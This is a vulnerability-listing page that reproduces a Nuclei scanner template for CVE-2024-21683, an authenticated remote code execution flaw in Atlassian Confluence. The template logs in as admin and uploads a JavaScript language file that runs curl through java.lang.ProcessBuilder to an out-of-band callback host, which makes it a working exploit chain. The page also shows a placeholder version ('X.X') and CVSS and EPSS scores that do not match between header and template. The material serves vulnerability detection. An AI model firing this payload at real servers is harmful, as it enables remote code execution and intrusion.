Atlassian Confluence Data Center and Server - Remote Code Execution

2024-05-2421:22:59

ProjectDiscovery

github.com

cve

atlassian

confluence

rce

authenticated

intrusive

remote code execution

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

Confidence

High

EPSS

0.947

Percentile

99.3%

JSON

Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.

id: CVE-2024-21683

info:
  name: Atlassian Confluence Data Center and Server - Remote Code Execution
  author: pdresearch
  severity: high
  description: |
    Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.
  reference:
    - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html
    - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21683
    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145
    - https://jira.atlassian.com/browse/CONFSERVER-95832
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 8.3
    cve-id: CVE-2024-21683
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 3
    fofa-query: "app=\"ATLASSIAN-Confluence\""
  tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive
variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        os_username={{username}}&os_password={{password}}&login=Log+in&os_destination=

      - |
        POST /doauthenticate.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Atlassian-Token: no-check

        password={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action

      - |
        POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
        Host: {{Hostname}}
        X-Atlassian-Token: no-check
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE

        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE
        Content-Disposition: form-data; name="languageFile";filename="{{randstr}}.js"
        Content-type: text/javascript

        new java.lang.ProcessBuilder["(java.lang.String[])"](["curl","{{interactsh-url}}"]).start()
        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE
        Content-Disposition: form-data; name="newLanguageName"

        {{randstr}}
        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE--

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 302 && status_code_2 == 302
          - contains(interactsh_protocol, 'dns')
          - contains(body_3, "confluence")
        condition: and
# digest: 4b0a00483046022100c28962a7e265cc6de6b2f4ff178c62e7cf092b4f48154a8007dbd880ce7ebb64022100c14be3544d81d99ae0f2196c504637e743b2148ad6f655ef7c311cbb8f7419a5:922c64590222798bb761d5b6d8e72950